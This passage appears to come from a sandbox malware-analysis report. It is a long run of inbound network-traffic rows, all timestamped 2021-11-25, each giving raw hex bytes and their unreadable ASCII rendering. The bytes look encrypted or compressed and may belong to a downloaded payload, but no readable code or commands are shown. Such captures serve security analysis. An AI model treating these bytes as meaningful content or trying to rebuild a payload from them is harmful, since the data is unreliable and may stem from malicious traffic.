bd 8a 57 73 be 9b f5 5f 7f 97 61 18 af 90 19 93 a8 71 62 de 38 1a 73 a8 19 aa 89 51 ea 33 9b 4c b0 db de 07 c7 e2 08 52 8b e0 ff 61 9f dd 3e 4f c1 1c ad 4f 8c de 87 0c 9d 1a 99 03 b5 Data Ascii: :QaVY6C@]JlGgf6AA1<R6'R{P,n{OP"{^c>I<I#6w:JMI8~$\mwI&&=fp\2&N>=X:RBbQ-T)Ws_aqb8sQ3LRa>OO
2021-11-25 15:51:21 UTC	232	IN	Data Raw: 0e f2 52 50 49 3c 0c f4 f5 1c a9 5e 62 b9 73 8a 68 de f8 c1 fa 03 36 4d 61 da 38 38 a5 57 f6 e7 8a f5 5d e6 b1 0a b6 45 37 c3 96 5e ec 43 de 94 90 ce 54 c0 8e e7 f7 60 84 df 70 3f d7 d4 b9 7a 19 8a 51 6e 29 11 ee 63 9c 0e 22 e4 0e 6c 25 8e 23 64 19 f0 04 8a f0 fa 90 e3 ef c1 af 33 b2 44 cb 0f 6c ca 07 d4 d2 54 0b 2f 3e a2 83 ae f3 57 d8 f8 97 be ac ac 93 69 49 74 31 41 d1 7f 95 11 f5 bb 4f 61 78 a6 b7 e5 a8 a8 85 b0 71 bb 57 1b cd f5 ac 23 ac 83 f1 19 ed 52 7a ca d4 7f 89 48 d0 64 8e 4c e5 68 67 e9 39 ae 6a b8 1e 95 7f cb aa 48 3a fa 2f ca 02 2e 71 8c 08 30 f5 dc eb 1f 97 90 6d e8 e3 0a 8c 6d 42 b6 f6 91 c8 ad e2 1e 3b 96 80 a3 2c 7a 6c 31 7f cb 8e 68 6d d2 bd fe 94 ef 5b f5 d9 94 b6 52 7d 0f fb a8 6a 14 72 69 54 00 13 2d 3d f5 bd 79 40 18 ef 61 81 4d 79 Data Ascii: RPI<^bsh6Ma88W]E7^CT`p?zQn)c"l%#d3DlT/>WiIt1AOaxqW#RzHdLhg9jH:/.q0mmB;,zl1hm[R}jriT-=y@aMy
2021-11-25 15:51:21 UTC	236	IN	Data Raw: f3 7b 18 50 8f 87 35 49 4b 47 b1 b7 e0 bb 58 20 23 dc 4a 03 25 ff 7a 16 bf 58 da f4 50 71 1a fa a2 f5 79 d9 8f 13 94 78 be a1 3f 75 65 b4 e7 b0 5d c6 ff f1 a3 fb e1 8c 3c ee fa 53 63 67 4a 5d 31 9b 97 24 30 76 c4 1a 4d 76 13 82 06 81 cc 14 27 ba d6 16 65 e5 33 60 4b 65 0e 43 87 25 c0 1a f5 8f 10 3c a6 01 3c c2 13 88 c6 2a 07 b9 e3 9e a0 99 59 a7 02 e1 f1 71 c7 a5 6b 16 ca 7c 1d 08 72 48 30 f7 1a 3a c1 dd 56 4a 1f 3b f0 78 08 06 67 cb 9c 40 67 88 26 27 22 ac b6 5c dd 7d 46 8c bd ee db 6d 1c 6d 95 02 f6 11 13 f5 1c 21 98 a6 57 bd ba 8e d3 39 fd d5 d0 ea 01 3a 30 9c 3b 42 ed b9 a2 44 42 b5 af e2 48 67 61 91 4a d7 64 9b 84 75 70 9e 39 b3 33 71 ba 3b 1e cd f1 c5 77 63 aa a4 1f a5 e2 c6 1f 9f 83 55 ff cf 78 80 e2 31 d9 78 f0 70 19 59 26 cf e8 89 cd 38 bd 19 d1 Data Ascii: {P5IKGX #J%zXPqyx?ue]<ScgJ]1$0vMv'e3`KeC%<<*Yqk\|rH0:VJ;xg@g&'"\}Fmm!W9:0;BDBHgaJdup93q;wcUx1xpY&8
2021-11-25 15:51:21 UTC	240	IN	Data Raw: 43 55 0d 32 65 12 35 a6 42 c2 fc 68 de 31 e7 ab 36 54 90 6a d9 54 90 62 ed 8e 7e 04 d8 e2 2c 5f 74 ef 8c 30 6a ee 0e 04 d8 fa 71 84 19 64 e9 50 9b 11 b6 49 2a ae af f7 f9 2c 75 5e f6 9d d8 2e 6e 30 6b c7 71 dc 3a f7 f9 43 3b 75 bc ce df fb ef d5 4c c0 80 28 7f bb 0f 8c 02 eb 94 85 97 fc 69 7f a7 03 58 5e f4 8d 82 ac b0 ed 92 3b cd 3f c7 13 b1 57 0b 4d 25 4b 22 19 a6 d8 c0 29 fe d0 dc 5b 78 fa 76 ce d8 7e 21 f8 73 76 3c 01 69 2a 70 c8 e4 2d f8 6e c6 d3 5b 4d 2b 36 51 db b4 72 cf aa b2 2c 7e 2e 64 d4 c3 b3 2e 90 74 6c da 92 7a 20 1c 0a c7 59 0d 6f 43 fb e1 69 54 b4 90 54 af 13 8d 46 8c 3d a6 7d 96 55 0d 88 0e 37 d8 d0 d8 a5 c4 98 64 93 f0 36 58 1d 9d 41 3b 79 b7 28 7a 05 52 ad 35 e1 aa 78 33 26 06 1b 9b 12 30 ba 95 39 d6 12 30 96 6f cf 5a 4e 99 04 de 5b 78 Data Ascii: CU2e5Bh16TjTb~,_t0jqdPI,u^.n0kq:C;uL(iX^;?WM%K")[xv~!sv<ip-n[M+6Qr,~.d.tlz YoCiTTF=}U7d6XA;y(zR5x3&090oZN[x
2021-11-25 15:51:21 UTC	244	IN	Data Raw: 10 38 41 3d d2 d6 d5 4f 3f c6 d9 40 89 88 d5 4e 40 41 dc 38 b1 24 e3 a9 d4 cc 10 39 24 0b bd 0a 4a aa 1b 9d 62 ee b1 24 4b 25 c2 ff af 2f a3 c9 38 55 5a 82 46 b0 ca eb 95 ee 19 a0 4a aa a7 c3 59 00 c5 76 10 39 fc 68 ed 92 43 39 ec 17 77 bc 78 32 92 70 31 e3 55 09 c8 e9 1c 18 ad 35 52 91 64 ec 88 0a 72 c1 30 6e 9c 5f 23 8e 25 81 c0 85 f6 7e 40 46 d8 c1 10 3e 30 6e d8 c1 58 82 36 5f 5b 7a 02 d9 74 c4 cc e7 9f d1 94 6a 1e 12 fa 75 52 90 86 16 a8 b8 12 30 e1 aa 37 dd 2a 7c bb 0b dd bc 14 35 7a 34 27 85 c2 f9 a8 b8 ca ed f2 01 07 54 fb eb f9 f6 09 4e e8 18 59 06 cc e6 0d 44 8b 83 ad 34 5b 7b 91 f1 44 be 41 39 18 20 dd bf d3 54 67 66 64 ee 85 93 7d af bf 02 4a af b7 1e 88 08 6d 57 af 2a d6 cc ac b5 7e 21 e8 1b f5 fb 81 99 90 7f d3 54 eb 90 06 d5 4e 99 e8 1b b5 Data Ascii: 8A=O?@N@A8$9$Jb$K%/8UZFJYv9hC9wx2p1U5Rdr0n_#%~@F>0nX6_[ztjuR07\|5z4'TNYD4[{DA9 Tgfd}JmW~!TN
2021-11-25 15:51:21 UTC	248	IN	Data Raw: f9 be d1 3c 07 00 b8 d8 88 44 c4 bc d1 2f d3 6d 6e f0 58 d6 9c 17 e5 ff 8d ca b2 dc 04 e7 9f 99 b9 58 d7 02 8d fd b3 7e 76 65 37 95 bd 50 d7 12 5a c7 3d 93 b8 fb d1 68 e1 90 32 34 2a 29 87 c4 ab 60 99 a8 e7 d8 fa 4f 23 b5 41 6f 1f c7 0e 6c 8a 54 c0 f2 3b f1 b8 cf 06 9e 2f bf 5a dd e9 e8 22 32 5a be da 90 2a 2a 07 02 83 d0 92 39 85 fc 54 af 13 e8 47 7d d0 8a 56 c1 34 2d a7 a9 04 e7 9f 85 c5 23 c1 23 d0 b5 4e c1 23 dc 70 9c 16 57 52 d0 8f af 72 93 b9 45 64 9e 69 64 d7 77 e9 cb 30 21 d3 08 a2 1f ca b4 c9 20 44 f5 81 d2 8e 35 8c 79 8c 3c 73 7d f8 25 d3 19 ff be ea 4b 78 6a 8f b7 4e d2 a8 e7 e9 c5 2f 9f eb a9 04 89 db e8 56 d7 12 59 50 c4 ab 60 b9 45 78 4a f3 c9 31 b4 c5 0e 00 dd 86 2c 27 d3 09 5a 8c 0f ef d6 9b 93 a8 e9 a4 78 09 74 ff df e6 bf 3b f1 b8 aa 87 Data Ascii: <D/mnXX~ve7PZ=h24)`O#AolT;/Z"2Z*9TG}V4-##N#pWRrEdidw0! D5y<s}%KxjN/VYP`ExJ1,'Zxt;
2021-11-25 15:51:21 UTC	252	IN	Data Raw: 27 77 ec 40 13 39 99 a4 02 bb ac 2e f4 43 6a 90 39 4c a2 58 a1 0f 32 d1 09 8b 14 9e 0b 86 8a a6 29 3b 2d 03 ef fa 10 53 1e 28 41 00 dd 86 2c 4b 19 9c 64 d7 77 87 af 13 8d 18 42 d9 20 d2 d5 4d 5e 37 bf 61 0c 04 94 23 c7 b0 17 e8 5d 17 25 03 d9 83 16 99 b4 5f ab a6 f8 b5 dd 73 a5 05 a2 cd c8 2d 0a 51 46 01 d9 0b 3b f1 b8 aa 87 af 13 8d be b9 2c 4b 19 9f a0 25 f3 5f 7f a2 48 6e c4 fd e1 6f df 0c 9a a0 b4 12 81 5f a0 ad 92 24 dd 54 1a e1 23 38 01 a0 b3 af 94 af ec cd e7 60 32 b6 6e 0f 47 ad 76 9f 76 8e 08 f1 b8 aa 87 af 13 8d be b9 2c 4b 19 98 17 c6 9d 06 d7 49 2a b9 7e 5d 7f 64 17 05 0d 81 79 3e f3 42 7d 4f 97 7d 3a e0 7a a4 32 6d 75 7d 74 48 1a e1 61 97 77 78 ed 16 81 5f de 70 b3 8c ad 74 bc b4 a0 6e f0 36 64 d7 77 87 af 13 8d be b9 2c 4b 84 46 d6 a1 0f 0c Data Ascii: 'w@9.Cj9LX2);-S(A,KdwB M^7a#]%_s-QF;,K%_Hno_$T#8`2nGvv,KI*~]dy>B}O}:z2mu}tHawx_ptn6dw,KF
2021-11-25 15:51:21 UTC	257	IN	Data Raw: 9b 3c bb b2 5c 5c 51 74 fc 49 0e 0c fb d1 68 e1 90 46 8c 3c 73 7d 96 55 32 5a be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d 86 b0 0a 6a 19 d9 39 a9 fb 97 91 8e be ef e5 cc 23 d5 12 6b 96 3c 19 f0 c9 20 5a c9 ab 77 f9 4d e1 15 15 1a b5 90 f3 0b 77 0a 66 4f 23 b5 22 32 9a 31 8a 0d 81 44 3f 76 fb 3c b5 86 d3 92 94 93 32 a3 1d 6e 0f 6d b2 24 c8 17 3d 74 00 7d 1c 65 a5 46 27 d6 c6 af 44 b5 22 32 5a be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af b5 7c 4d 40 82 0f ae bc 4b 4a c5 1e d7 2e 08 aa 78 52 f4 20 d2 81 cb 33 22 49 6f 08 0e 83 27 3c 8c 45 70 8d 55 b8 22 ba 82 e1 53 ee 3d aa dc 5f 9a 2f 85 93 32 b9 9b 6a 19 76 c7 d3 92 bc 6f c9 ab f7 3f 21 4f dc fa ad f1 49 c6 Data Ascii: <\\QtIhF<s}U2Z,Kdw,Kdwj9#k< ZwMwfO#"21D?v<2nm$=t}eF'D"2Z,Kdw,Kdw,Kdw\|M@KJ.xR 3"Io'<EpU"S=_/2jvo?!OI
2021-11-25 15:51:21 UTC	261	IN	Data Raw: af db 76 04 7e d8 1c 23 24 f6 a9 04 51 f4 ce e1 3d 37 74 ff 7f 24 e9 a4 d8 42 5b 41 91 75 65 5a 35 5f b3 1d 2a fd 23 b5 af a4 9a 5f d3 d7 a9 04 7e a2 ab 09 e0 a7 3d f6 c1 ed 76 04 66 71 a2 73 ff 71 ab 09 fc ff 15 92 c7 e8 e4 18 99 7d 56 b4 08 59 94 50 19 2f 45 0a 4f 8b 21 b0 3c ef 3b f1 24 90 f3 bd b7 89 2a 46 11 17 36 64 4a 0f 16 14 9b 75 16 14 81 34 d7 77 03 ed 3e 78 83 2e dd 86 d3 80 6c eb 56 5d 2a 46 71 99 b4 a0 94 8e 2b c9 ab d3 0c fb 2d 1a 40 7d 46 37 83 a5 2c fa 2b c9 85 1a 7a 0e ca 6c 93 cd 9a fd ae 91 0c 5c ad 0e cb f3 e9 a4 b9 81 f7 c7 8c 9d b4 a0 ae 03 00 dd 44 00 b1 18 d3 f1 f7 c7 e8 ee 4e a0 cd 9b 9d e6 8a f9 ba af b8 16 7a 0e b8 09 2c 4b aa 23 eb a9 b9 bb 40 7d 25 37 8f c3 f4 cb 38 69 c9 c5 28 41 ac 0b 18 19 23 2a 15 92 f8 c9 0b 79 2a d7 23 Data Ascii: v~#$Q=7t$B[AueZ5_#_~=vfqsq}VYP/EO!<;$F6dJu4w>x.lV]Fq+-@}F7,+zl\DNz,K#@}%78i(A#y*#
2021-11-25 15:51:21 UTC	264	IN	Data Raw: c3 03 f1 2d 5a 2f 47 99 4c f6 5a e1 90 46 8c 3c 6e ca ef 05 d5 a3 3f 29 0e ba 6c 1f 00 73 c2 7e 86 27 2a d0 72 74 70 74 a8 f3 bd 36 64 d7 77 87 81 9a 67 ee 8b 7a cd 94 93 7b 2b 3a aa bd 8b 79 cc 44 02 aa cd 55 7e 6a e6 1d a6 7d 96 55 32 5a 8e 7b a6 d2 5d fc ee f2 fb 67 ed 7b 54 95 1e 68 79 03 3d f6 45 0a f6 45 0a f6 45 0a f6 45 0a f6 77 34 68 db 2e e6 a7 45 b0 20 9f 38 98 66 8c af 98 03 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 ce d4 43 b0 29 06 25 77 4a 5f 8b 7a af 53 b5 ae c8 d2 eb a9 04 e7 9f eb a9 04 e7 9f eb a9 04 e7 9f eb 32 41 29 ee 1e 07 43 29 5f 4b 61 d5 fe 00 dd 86 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be f9 54 2f 8a 37 e7 9f eb a9 04 e7 9f eb a9 04 e7 9f eb a9 04 e7 9f eb a9 04 e7 9f eb a9 04 e7 9f a8 c5 13 8d Data Ascii: -Z/GLZF<n?)ls~'*rtpt6dwgz{+:yDU~j}U2Z{]g{Thy=EEEEw4h.E 8fdw,KdC)%wJ_zS2A)C)_Ka,Kdw,KdwT/7
2021-11-25 15:51:21 UTC	268	IN	Data Raw: 2c 4b 19 98 32 5a be 34 47 0f 83 a5 fa 4f 23 b5 22 32 5a b7 af 13 8d 3d 66 dc 04 e7 9f eb a9 04 e7 9f eb b9 84 27 bf 49 fc 54 af 13 8d be b9 2c 4b 19 9c 61 38 69 64 ba 2f d3 6d 6e f0 36 64 d7 77 87 af 15 5a be b9 4a 2e 50 a5 fa 4f 23 b5 22 32 5a be b1 b0 96 55 6c fb d1 68 e1 90 46 8c 3c 73 7d 96 54 87 af 13 d1 80 1d a6 7d 96 55 32 5a be b9 2c 4a 7e 18 19 c7 4f 23 b5 22 32 5a be b9 2c 4b 19 9e 81 a0 6e a8 9a 5f 4b 19 9c 64 d7 77 87 af 13 8d 6e f0 36 f1 78 09 74 fd 3e 78 09 70 fc 54 ae 91 c8 d2 eb a9 04 e7 9f eb a9 04 e7 9f eb a9 04 e5 42 82 22 36 6d 6e f1 b8 aa 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 ad c6 cd 5e cc d5 72 fb d1 68 e1 90 46 8c 3c 73 7d 96 55 32 5a be b9 2c 49 ac 8c 3c 77 8e 41 01 5f 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9e c1 40 7d Data Ascii: ,K2Z4GO#"2Z=f'IT,Ka8id/mn6dwZJ.PO#"2ZUlhF<s}T}U2Z,J~O#"2Z,Kn_Kdwn6xt>xpTB"6mn,Kdw^rhF<s}U2Z,I<wA_Kdw,K@}
2021-11-25 15:51:21 UTC	272	IN	Data Raw: da a8 92 6f 07 e7 d7 7f bf 67 d6 bd fa 83 69 a8 4e 6c 27 73 b1 db da bf ff 58 f1 7b 1a dd 14 00 c6 e1 b4 c4 72 f5 cb 27 7c 28 be 46 7e 16 01 a0 36 37 6a f6 0e 8d fa 6f 57 73 f0 7a d5 41 40 91 4b 51 7b d1 a4 b4 6c 27 73 b1 db de ea ac c5 6a 8d 35 ab 11 d3 e6 54 68 6a ae 91 c8 d2 5b 65 c6 40 31 20 a6 35 1d 59 cf 4a 83 5a 9e 4d 5a 37 2c c0 6b e2 5b 88 02 a7 ff db 81 60 e9 20 a6 55 16 50 2c 7b b5 5e e9 a4 78 09 b0 b2 1f 20 15 b6 d9 5d 06 c8 ae b0 de 41 24 4b 38 21 e0 2a 02 6b 21 4f dc f0 8a 32 d7 3b 89 90 02 69 2c 13 a9 78 28 09 3b 84 27 bf 3e 00 e0 f1 47 fd 72 ef 4c c7 3a ae 14 47 f7 4c d3 92 b4 53 a7 ea d8 da db c5 c3 c5 4a 96 55 d3 ec 6d 6e f0 36 a4 5c 47 84 0f a7 bb b8 aa b7 03 00 5e c8 ea 03 00 5e 88 15 ee b8 e2 13 8d be 7d b2 1f 20 2d 86 08 95 51 60 9d Data Ascii: ogiNl'sX{r'\|(F~67joWszA@KQ{l'sj5Thj[e@1 5YJZMZ7,k[` UP,{^x ]A$K8!*k!O2;i,x(;'>GrL:GLSJUmn6\G^^} -Q`
2021-11-25 15:51:21 UTC	276	IN	Data Raw: 77 87 af 13 8d be b9 2c 4b 19 80 1d a6 6f 73 7d 96 55 26 3c 73 dd 86 2c 4b 19 9c 64 d7 77 87 af 13 8c 34 5f 4b 59 3c 73 7d d0 76 04 e7 cf 63 55 32 5a 1e 28 41 21 fc 54 af 13 8d be b9 2c 4b 19 9c 64 c7 4f 23 b5 22 32 5a be b9 2c 4b 09 74 ff db 81 a0 6e e0 0e 00 dd 86 2c 4b 19 9c 44 87 af 13 8d be b9 24 37 e7 1e 68 e1 92 4b 19 44 8c 3c 73 79 8c 3c 73 cd 5e c8 d2 eb a9 04 e6 1d a0 6e f1 b8 ac 8c 3d f6 43 05 69 66 dc 04 e7 8f c3 45 0a f6 44 87 af 13 8d be b9 3c 73 7d 96 43 95 d2 eb a9 04 e7 9f bf 3b f1 b8 b2 9b e1 99 de 02 e2 31 d8 0a f6 45 0a f6 45 0a f6 45 40 26 f5 b2 9b e4 9e 0d 7e 18 5c 93 cd 5e c8 d2 eb a9 04 e7 9f eb a9 04 e7 9f eb a9 04 e7 9f eb a9 04 e7 9f 7f f5 ca f6 2d ad 67 0d ea 49 1c 03 f0 c9 24 1f 3f 95 da df 1f 51 58 91 5c ad 06 cc 48 75 f2 13 Data Ascii: w,Kos}U&<s,Kdw4_KY<s}vcU2Z(A!T,KdO#"2Z,Ktn,KD$7hKD<sy<s^n=CifED<s}C;1EEE@&~\^-gI$?QX\Hu
2021-11-25 15:51:21 UTC	280	IN	Data Raw: 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 c2 ce e6 1d 59 9d 61 1c dc ab 90 1e d7 df 13 d5 8d 04 4d 76 fb 03 a1 8e be 66 0d e5 7b 4f f9 7c 01 40 61 41 00 dd 86 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 80 92 c4 47 8b e6 42 dd 32 2e 24 43 b3 6b 1f dd 10 78 74 82 68 78 90 df 8b b9 2c 4b 08 a6 26 63 ce c0 a6 75 7d 18 76 4d e1 3e f6 21 4f ba d0 ab f6 ca ae aa 78 a3 6d 38 96 88 f9 4f 55 55 6c d0 e6 1d a6 7d 96 55 32 5a be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 c9 c8 4e 3c 96 05 39 bc 4b 54 e3 d9 83 fc 0e 5c 3c 17 f0 5f b4 d3 1a 67 a7 84 59 bd f6 e2 b8 07 60 5f dc 9f d8 b6 e0 4e 57 86 a5 99 23 46 45 ae 6e 09 af ad f1 56 6b a9 fb 1f 1d 37 18 b2 0f d3 aa 24 a3 af 16 42 c9 7f 9b e1 90 46 Data Ascii: dw,KdwYaMvf{O\|@aA,Kdw,Kdw,KGB2.$Ckxthx,K&cu}vM>!Oxm8OUUl}U2Z,Kdw,KdN<9KT\<_gY`_NW#FEnVk7$BF
2021-11-25 15:51:21 UTC	284	IN	Data Raw: 11 da 00 7d e5 d4 39 76 70 a6 21 c3 c1 13 15 c7 36 5a 52 e7 ef 86 d3 3a 10 40 82 b2 1e 71 87 03 e5 c0 41 bd bf 5d b9 89 38 0a 09 00 4a c2 3c e1 52 c5 b7 84 ea 5b ce 8f 44 d3 6e c9 1c 08 f1 b8 aa 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 f4 68 c0 a7 01 26 6c cc 23 cf 32 73 82 a5 99 9c 9b 6d 08 b0 69 ea 4f 62 2d 5e af 2c b4 32 05 54 78 8a 43 4c 7b e9 07 35 1d 26 97 8d 41 66 56 f2 c4 92 3c 3a 91 51 53 7c ec 83 d9 35 1d 09 08 b3 e2 a3 75 c3 ba 07 ff 91 37 42 29 9b 1e 81 6f f1 47 cf 86 bb b0 fe 26 6c eb a9 04 e7 9f eb a9 04 e7 9f eb a9 04 e7 9f eb a9 04 e7 9f eb a9 04 e7 9f eb a9 04 e7 9f eb a9 04 e7 9f eb e7 d1 00 59 80 4a cc 8b 46 00 81 8e be ca 9c 45 f5 b3 51 0f 7c 92 17 af ec ad 54 9b 16 Data Ascii: }9vp!6ZR:@qA]8J<R[Dn,Kdw,Kdw,Kdh&l#2smiOb-^,2TxCL{5&AfV<:QS\|5u7B)oG&lYJFEQ\|T
2021-11-25 15:51:21 UTC	300	IN	Data Raw: 44 a9 04 e7 99 f8 4a 96 35 72 fa 4f 23 b5 16 30 34 2b a8 e6 74 d1 68 e1 92 fb d1 68 bc 54 af 13 8d be 8a 13 ec 58 d8 9e 00 f3 bd 36 64 cf 63 55 6f bb 31 d8 fa 4f 11 ac ed da 9e 0d 17 b9 2c 4b 19 6c eb a9 58 61 50 a5 9b 95 b3 79 f4 6e f0 36 66 34 5f 4b 40 8d be b9 2c 2c 29 a0 14 75 f8 6e 91 bc d5 16 66 f2 3b f1 ba 33 dd 86 7b c5 4a 96 34 2b a8 e6 6f 5d 46 8c 3e bc b4 a0 3a fe 59 3c 00 a9 65 33 ba 81 a0 6e f0 3a 6e f0 62 56 b4 a0 1d c2 aa e1 f7 e9 a4 78 09 20 2d ce b5 12 0a f6 45 0a ac c5 12 2e 04 b5 61 7e 18 19 9c 6c eb a9 50 8d be b9 2c 4b 40 34 07 4a c2 91 8b 97 d7 77 87 a7 ff db d5 52 aa 87 af 52 eb e0 56 90 12 58 fa 61 50 a5 fa 47 0f 83 f1 a0 6e f0 36 64 96 1c 7b b5 76 56 f7 e9 a4 78 09 7c 13 8d ea 37 e7 9f eb a9 5e 8b e1 b4 f4 12 49 3a 6e f0 36 6c eb Data Ascii: DJ5rO#04+thhTX6dcUo1O,KlXaPyn6f4_K@,,)unf;3{J4+o]F>:Y<e3n:nbVx -E.a~lP,K@4JwRRVXaPGn6d{vVx\|7^I:n6l
2021-11-25 15:51:21 UTC	312	IN	Data Raw: f3 42 01 a0 91 34 47 e7 bf 1f ff 52 e6 35 c6 91 41 4c ab 2d b2 12 32 7e 5c 4a 96 55 27 c7 6b ed 25 ba ef 97 b3 9e 21 e0 2a 02 6b 21 b0 96 50 b5 06 68 6c a3 95 f6 01 d6 bd 36 64 d6 e5 be 3d 7b d9 0c df cf ea 6f 73 7d 96 d5 56 30 d8 b2 40 4f 21 5b 40 ce e5 ee 31 d8 fa 15 51 15 11 c0 b0 e3 6a 63 55 32 4f 4b 3d 6a 6d 22 32 5a ab 69 40 e9 2f 9f eb a9 11 f8 6e 4c 10 05 69 71 68 c5 ce 68 a9 c0 8d f6 45 0a a2 b2 9e e2 5b a1 db c9 54 af 37 f4 a8 82 22 27 97 6f 24 64 97 1b 6d a2 bf f7 0b b5 ee fd 29 3b 0b 64 3f fb d1 68 e2 2b ed ea e0 5e ec 68 68 a9 24 13 c1 cd 16 24 13 c1 c9 1c 1b e2 98 12 2e 14 86 64 17 a4 3d f2 78 6a ae 5d b9 d3 97 9e 81 80 39 a0 e3 dd 8d cb 90 c3 0d 7e 18 19 9b a1 d4 b4 67 17 b3 39 a8 0b 3d 36 64 d3 64 f7 e3 d1 af 2b ed ea ae d5 72 fa 4f 22 8a Data Ascii: B4GR5AL-2~\JU'k%!*k!Phl6d={os}V0@O![@1QjcU2OK=jm"2Zi@/nLiqhhE[T7"'o$dm);d?h+^hh$$.d=xj]9~g9=6dd+rO"
2021-11-25 15:51:21 UTC	328	IN	Data Raw: 92 4b 19 9c 6c eb a9 02 c2 f4 64 b6 d1 09 10 6c c5 4a 95 d2 eb a9 02 e2 13 84 67 5f 4b 19 9c 17 e4 7a 20 2d cd 5e c8 d2 e9 a4 78 09 44 87 af 13 ec 58 d8 9e 47 0f 80 1d a6 7d 97 d7 77 9e 79 8c 3c 73 09 0c 9e 1d 88 31 db 81 a0 6e f8 4a 96 50 dd b0 b2 fa 3b 90 22 5b 6f 73 7e 18 19 9c 6c eb a9 05 15 a6 59 5d 32 3b 95 bb 1f ab 0a f6 45 0a fe 59 3c 71 ac b9 08 90 32 3b 95 bb 1f ab 0a f6 45 0a fe 59 3c 75 be 8e 65 3b 85 cb 3d 9f c5 4a 95 d2 eb a9 02 e2 13 84 67 5f 4b 19 9c 17 e4 7a 20 2d cd 5e c8 d2 e9 a4 78 09 44 87 af 13 ec 58 d8 9e 47 0f 80 1d a6 7d 97 d7 77 9e 61 50 a5 fa 3b 89 d1 1c 0d 7e 1b a1 f0 36 6c eb a9 01 31 ee 15 f3 c9 35 86 45 24 37 e4 18 19 9c 6c eb a9 05 1d 92 6f 12 7e 79 e8 4b 37 e7 9c 64 d7 77 8f c3 45 08 3d c3 61 31 ac ed ca be 97 d7 74 ff db Data Ascii: KldlJg_Kz -^xDXG}wy<s1nJP;"[os~lY]2;EY<q2;EY<ue;=Jg_Kz -^xDXG}waP;~6l15E$7lo~yK7dwE=a1t
2021-11-25 15:51:21 UTC	344	IN	Data Raw: 4b 19 ec 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 c9 54 ae 91 c8 d2 eb a9 04 e7 70 f5 c2 c3 45 0a f6 45 e2 8c 6e f1 4b 19 98 5a be b9 2c 4b 19 9c 8c 3c 73 7d 96 55 32 5a 59 69 64 d6 f5 c2 c3 45 0a f6 45 ed ae 91 c8 d2 eb a9 04 78 5b 41 01 5f 4b 19 9c 64 d7 77 18 19 9c 64 d7 77 87 af 9a c0 ec 2d 3d f6 41 00 dd 86 2c 4b 19 9c ed ae 91 c8 d2 eb a9 04 66 8e 41 01 5f 4b 19 9c 64 d7 77 06 ec 2c 4b 19 9c 64 d7 07 6e f0 36 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 30 55 33 dd 86 2c 4b 19 9c 64 83 a5 fa 4f 23 b5 22 32 62 82 22 33 dd 86 2c 4b 19 9c 64 ef b3 1d a6 7d 96 55 32 6d 6e f0 36 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 37 e7 9e 69 64 d7 77 87 af 13 ea 27 bf 3b f1 b8 aa 87 b3 1d a6 7d 96 55 32 5a be b9 2c 4b 19 9c 64 d7 77 d4 f0 37 e7 9f eb a9 04 e7 9c 34 Data Ascii: K,Kdw,KTpEEnKZ,K<s}U2ZYidEEx[A_Kdwdw-=A,KfA_Kdw,Kdn6dw,K0U3,KdO#"2b"3,Kd}U2mn6dw,K7idw';}U2Z,Kdw74
2021-11-25 15:51:21 UTC	360	IN	Data Raw: 81 8d ca a4 17 ff f4 32 3f 8f b0 f7 aa e4 7b f6 6a 90 23 d1 1b d2 84 55 51 07 54 ec 2c 3f 89 d7 58 cd 2c 28 6c df bd 41 2d b9 4b 77 ee 5c ec 58 d0 81 8d 8d c8 ff ef 85 dd ab 7e 7f f5 ab 64 f8 29 b6 d6 da 89 d1 0c 88 42 ed dc 67 70 cf 20 2c 4b 19 9d e6 1d a6 7c 12 0b 78 09 79 82 d9 7d 97 d7 77 86 2b c9 56 b4 a0 6f 32 5a be b9 2d ce 82 0c 9e 11 ed da 96 3b 98 39 ec 2c 3f 89 d7 58 cd 2c 28 6c df bd 41 2d b9 4b 77 ee 5c ec 58 d0 81 8d 8d c8 ff ef 85 dd ab 7e 7f f5 ab 64 f8 29 b6 d6 da 89 d1 0c 88 42 ed dc 67 70 cf 20 2c 4b 19 9d e6 1d a6 7c 12 0b 78 09 79 82 d9 7d 97 d7 77 87 fb d1 6a e6 1d a6 27 be b8 aa 84 25 bb 26 3f 2d d8 f9 76 77 84 b0 bc 37 5a cb 8f bb 32 02 ec 2f 89 dc bf 50 09 0b dc 07 34 73 75 12 13 8e 11 89 b5 ac 8f c3 45 0a f6 24 0b 59 dc 06 e5 9a Data Ascii: 2?{j#UQT,?X,(lA-Kw\X~d)Bgp ,K\|xy}w+Vo2Z-;9,?X,(lA-Kw\X~d)Bgp ,K\|xy}wj'%&?-vw7Z2/P4suE$Y
2021-11-25 15:51:21 UTC	376	IN	Data Raw: 87 bf 04 e7 9f eb a9 04 e7 9f e8 22 32 5a be d8 c6 eb a9 04 84 09 44 b6 d5 14 50 f1 ea 64 f8 3e 0a 95 fd a2 01 3c 5e fc 62 a5 d7 00 ba c1 29 a9 2b bd 5f 2c 66 ef c5 67 6b 5f 3c 5e bf 5c ad 67 32 75 e1 e2 60 e2 65 3f 9f 98 29 ab 7b f2 14 35 a1 f1 b8 93 f4 35 8c 5b 7c 77 f3 ce cc fc 66 93 e0 2e 37 ca f7 f3 8b 94 66 e4 60 f0 5e ab 7b f0 5b 6c cb 3a 07 1c 46 e2 76 63 68 84 49 61 24 5a 93 ed 9a 69 09 59 1c 11 a6 44 a9 30 75 c1 60 98 14 48 90 4e a0 6e e3 bb 31 dc 04 e7 9f 51 28 41 00 dd 86 4d 22 4a 46 8f ca d7 77 87 64 df 8a 37 b8 f5 96 06 a5 b6 